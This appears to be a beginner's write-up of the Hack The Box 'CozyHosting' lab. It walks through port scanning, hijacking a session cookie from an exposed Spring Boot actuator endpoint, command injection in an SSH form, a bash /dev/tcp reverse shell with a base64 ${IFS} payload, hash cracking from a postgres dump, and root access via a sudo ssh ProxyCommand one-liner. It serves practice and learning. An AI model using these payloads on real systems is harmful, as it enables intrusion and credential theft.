CozyHosting Lab
Hack the Box Penetration Lab
Reconnaissance
First up, a port scan:
┌─[zero@parrot]─[~]
└──╼ $nmap -p- -sCV 10.10.11.230
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-05 11:19 PST
Nmap scan report for cozyhosting.htb (10.10.11.230)
Host is up (0.037s latency).
Not shown: 65471 closed tcp ports (conn-refused), 61 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)
|_ 256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Cozy Hosting - Home
|_http-server-header: nginx/1.18.0 (Ubuntu)
1111/tcp open lmsocialserver?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelThe scan revealed 3 TCP ports that were currently open: 22, 80 and 1111. Not knowing exactly what an lmsocialserver? was, I quickly google’d it, revealing some random 19 year of forum posts that didn’t tell me too much. From researching I know there are some nginx vulnerabilities and you can use a tool called nginxpwner. But I will dig further before trying anything.
Then a fuzz scan:
┌─[zero@parrot]─[~]
└──╼ $./feroxbuster -u http://cozyhosting.htb -w SecLists/Discovery/Web-Content/raft-large-directories.txt -k
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://cozyhosting.htb
🚀 Threads │ 50
📖 Wordlist │ SecLists/Discovery/Web-Content/raft-large-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.1
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 1l 2w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 34l 172w 14934c http://cozyhosting.htb/assets/img/pricing-starter.png
200 GET 29l 131w 11970c http://cozyhosting.htb/assets/img/pricing-free.png
200 GET 38l 135w 8621c http://cozyhosting.htb/assets/img/favicon.png
200 GET 43l 241w 19406c http://cozyhosting.htb/assets/img/pricing-business.png
200 GET 38l 135w 8621c http://cozyhosting.htb/assets/img/logo.png
200 GET 79l 519w 40905c http://cozyhosting.htb/assets/img/values-2.png
200 GET 97l 196w 4431c http://cozyhosting.htb/login
200 GET 73l 470w 37464c http://cozyhosting.htb/assets/img/values-1.png
200 GET 29l 174w 14774c http://cozyhosting.htb/assets/img/pricing-ultimate.png
200 GET 81l 517w 40968c http://cozyhosting.htb/assets/img/hero-img.png
200 GET 7l 1222w 80420c http://cozyhosting.htb/assets/vendor/bootstrap/js/bootstrap.bundle.min.js
200 GET 295l 641w 6890c http://cozyhosting.htb/assets/js/main.js
200 GET 2018l 10020w 95609c http://cozyhosting.htb/assets/vendor/bootstrap-icons/bootstrap-icons.css
200 GET 83l 453w 36234c http://cozyhosting.htb/assets/img/values-3.png
200 GET 1l 218w 26053c http://cozyhosting.htb/assets/vendor/aos/aos.css
200 GET 2397l 4846w 42231c http://cozyhosting.htb/assets/css/style.css
200 GET 1l 313w 14690c http://cozyhosting.htb/assets/vendor/aos/aos.js
401 GET 1l 1w 97c http://cozyhosting.htb/admin
204 GET 0l 0w 0c http://cozyhosting.htb/logout
200 GET 1l 625w 55880c http://cozyhosting.htb/assets/vendor/glightbox/js/glightbox.min.js
200 GET 7l 2189w 194901c http://cozyhosting.htb/assets/vendor/bootstrap/css/bootstrap.min.css
500 GET 1l 1w 73c http://cozyhosting.htb/error
200 GET 14l 1684w 143706c http://cozyhosting.htb/assets/vendor/swiper/swiper-bundle.min.js
200 GET 285l 745w 12706c http://cozyhosting.htb/
200 GET 285l 745w 12706c http://cozyhosting.htb/index
400 GET 1l 32w 435c http://cozyhosting.htb/plain]
400 GET 1l 32w 435c http://cozyhosting.htb/[
400 GET 1l 32w 435c http://cozyhosting.htb/]
400 GET 1l 32w 435c http://cozyhosting.htb/quote]
400 GET 1l 32w 435c http://cozyhosting.htb/extension]
400 GET 1l 32w 435c http://cozyhosting.htb/[0-9]
400 GET 1l 32w 435c http://cozyhosting.htb/20[0-9][0-9]
400 GET 1l 32w 435c http://cozyhosting.htb/[0-1][0-9]
400 GET 1l 32w 435c http://cozyhosting.htb/[2]
400 GET 1l 32w 435c http://cozyhosting.htb/^[0-9]
200 GET 1l 1w 634c http://cozyhosting.htb/actuator
400 GET 1l 32w 435c http://cozyhosting.htb/[2-9]
400 GET 1l 32w 435c http://cozyhosting.htb/options[]
[####################] - 5m 62320/62320 0s found:38 errors:0
[####################] - 5m 62283/62283 195/s http://cozyhosting.htb/ ┌─[zero@parrot]─[~]
└──╼ $./feroxbuster -u http://cozyhosting.htb/actuator -w SecLists/Discovery/Web-Content/raft-medium-directories.txt -k
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://cozyhosting.htb/actuator
🚀 Threads │ 50
📖 Wordlist │ SecLists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.1
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 1l 2w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 1l 1w 634c http://cozyhosting.htb/actuator
200 GET 1l 1w 48c http://cozyhosting.htb/actuator/sessions
200 GET 1l 1w 15c http://cozyhosting.htb/actuator/health
400 GET 1l 32w 435c http://cozyhosting.htb/actuator/[
400 GET 1l 32w 435c http://cozyhosting.htb/actuator/plain]
200 GET 1l 120w 4957c http://cozyhosting.htb/actuator/env
400 GET 1l 32w 435c http://cozyhosting.htb/actuator/]
400 GET 1l 32w 435c http://cozyhosting.htb/actuator/quote]
200 GET 1l 542w 127224c http://cozyhosting.htb/actuator/beans
400 GET 1l 32w 435c http://cozyhosting.htb/actuator/extension]
400 GET 1l 32w 435c http://cozyhosting.htb/actuator/[0-9]
[####################] - 3m 30002/30002 0s found:11 errors:0
[####################] - 3m 30000/30000 170/s http://cozyhosting.htb/actuator/ The first fuzz scan revealed that there were a decent number of pages to be explored: login, logout, admin, index and actuator. I then did a further fuzz scan on actuator since this one stood out to me as a none default page.
After doing so I found more pages that could possibly have a foothold within them: sessions, health, env and beans.
Before checking those out, I dug into the source code of the main page to see what it was built off of and if I could find anything of interest.
<link href="assets/vendor/bootstrap-icons/bootstrap-icons.css" rel="stylesheet">
<link href="assets/css/style.css" rel="stylesheet">
<!-- =======================================================
* Template Name: FlexStart
* Updated: Mar 10 2023 with Bootstrap v5.2.3
* Template URL: https://bootstrapmade.com/flexstart-bootstrap-startup-template/
* Author: BootstrapMade.com
* License: https://bootstrapmade.com/license/
======================================================== -->
</head>The first thing I noticed was it was made using a template called BoostrapMade and there was a direct link to the website. Although nothing really stood out to me.
Looking back at the URL paths I found, there was a strange occurance when visiting both /acuator/health and /acuator/env both appeared to have a somewhat broken endpoint which could be useful. However after looking at /acuator/sessions I found what appears to be a session cookie for a user called kanderson. This could be the foothold I was looking for, a session hijack using this new cookie.
8EAC013F0A6A9CCE2F06166E0F91FBEB: "kanderson"
After opening my inspect element and replacing my cookie with kanderson’s I was able to bypass the login screen and load into the admin dashboard.
Press enter or click to view image in full size
I did find that I was kicked out of the dashboard every so often. It seems the cookie became invalid after a certain amount of time. So I used a curl command in my terminal to grab a new cookie to carry on trying to find more of a foothold.
┌─[zero@parrot]─[~]
└──╼ $curl -i -k http://cozyhosting.htb/actuator/sessions
HTTP/1.1 200
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 20 Feb 2024 19:19:22 GMT
Content-Type: application/vnd.spring-boot.actuator.v3+json
Transfer-Encoding: chunked
Connection: keep-alive
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
{"C0F9E22583CAF00F5EEF4D06C378CD29":"kanderson","DEA37E9DC95C746A6C893B0EF2DC9E46":"UNAUTHORIZED","7581D8F66C4A37806FC9B8D92C05C419":"UNAUTHORIZED","F5706B25C94359D796AA494D5586677C":"kanderson","E922E0095DF399023C5DCBA4A33AD1D2":"kanderson","CCA059D462C590145236FF2A0A8092DA":"UNAUTHORIZED"}Interestingly I found there was a remote host connection tool. After entering a few random combinations of Hostname and Username I got a timeout error. The one that stood out to me was a HTTP Status 400 error,
Here are some of the errors that I got:
ssh: Could not resolve hostname qwe: Temporary failure in name resolution
ssh: connect to host 0.0.0.123 port 22: Connection timed out
Host key verification failed.
HTTP Status 400 – Bad RequestPress enter or click to view image in full size
I fired up BurpSuite to see what kinds of requests are being made when I am hitting the submit button. Entering a default IP address of 127.0.0.1 with no Username threw up this raw response in BurpSuite:
(Note, around this time I had made the switch to Kali from ParrotOS. Kali seems so much quicker and the UI is a lot sleeker.)
Judging by line 5 the backend was trying to execute the command directly with a SSH which could be prime for manipulation. Admittedly at this point I was a little stuck. Looking at another write up online I found if you put an ‘ after the username you can trigger something to make sure it’s a bash shell.
Accessing the system
Now to create a bash file in order to get a reverse shell, then attempt to get a stable shell after that. This is the bash file that I would attempt to upload to their side of the server. I chose a port number and set up a listener.
echo "bash -i >& /dev/tcp/[YOUR IP]/[PORT] 0>&1" | base64 -w 0;echo${IFS%??}"YmFzaCAtaSA+JiAvZGV2L3RcC8xMC4xMC4xNC4yMTEvOTAwMCAwPiYxCg=="${IFS%??}|${IFS%??}base64${IFS%??}-d${IFS%??}|${IFS%??}bash;Press enter or click to view image in full size
After converting my payload to base64 and copy-pasting it into the username section I was about to gain access to the shell. I then needed to make it a stable shell.
To gain a more stable shell I used this python script, note do this every single time you log back in:
python3 -c 'import pty;pty.spawn("/bin/bash")' After doing this I now just poke around a little and see who I am, what IDs there are and what files are under the current dir.
It looks like there is a .jar file that would be nice to dig into. I then set up a listener on the target machine for me to then grab the file from my machine using wget.
sudo wget http://10.10.11.230:4444/cloudhosting-0.0.1.jarPress enter or click to view image in full size
After a brief search using jd-gui, I have found the username and password to a database called “cozyhosting”. Now after logging back into the machine using the same steps above.
The machine was very slow at this point and would constantly be stuck loading even when in the machine itself, I ended up switching vpns on HTB to TCP. This seems to have fixed the connectivity issues.
I went ahead and did a little research on how to interact with a postgres database. I used the following to attempt to login:
psql -h 127.0.0.1 -U postgresAfter using the password to login, I was able to connect to the cozyhosting database and view the contents of the users column. This revealed a hash of the passwords for both “kanderson” and “admin”. Next step, using John the Ripper to crack this password.
I copy and pasted the admin’s hashed password into a txt called hash. Next I ran John and used the list called rockyou.txt, revealing the password below:
Press enter or click to view image in full size
So with this password I attempted to login using the username admin then the password that I had just cracked. Sadly the username admin didn’t exist, so this password must belong to someone else. I chose to list the dir in the home dir to see if I could find another username.
Press enter or click to view image in full size
Turns out there is a user called “josh”. Now let’s try and login using his username and the password we got earlier. Success! We logged in using that combination of username and password. Exploring their files I find the user flag in a file called user.txt!
The final root flag was a little tricky, I didn’t know how to get root access from the shell. So after a little research, it looks like if the current user can use all commands in ssh as root, then there is a small payload that can be used to secure the access: https://gtfobins.github.io/gtfobins/ssh/#sudo.
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' xPress enter or click to view image in full size
After that it was a pretty simple hunt for the flag: root/root.txt!
Conclusion
This took me quite a while to complete. I got stuck when creating the bash reverse shell script. I had one noted down from some of the HTB tutorials, but didn’t know you had to convert it to URL encoded key chars. Which can be done in BurpSuite. PSQL was also something I was not familiar with, so looking up the documentation for that and some examples really helped.
Speaking of BurpSuite, I learned a lot more about using its basic functionality. I am still not 100% confident on using it to send a response. But using the fields on the website I was about to manually do it. I am sure later down the line I will need to use it to inject code, so that will be a good learning experience.
Overall I am pretty happy with my first box, it took a little bit of research and help from another user’s write-up, but learning a lot and making plenty of notes for the future is always good.
Last updated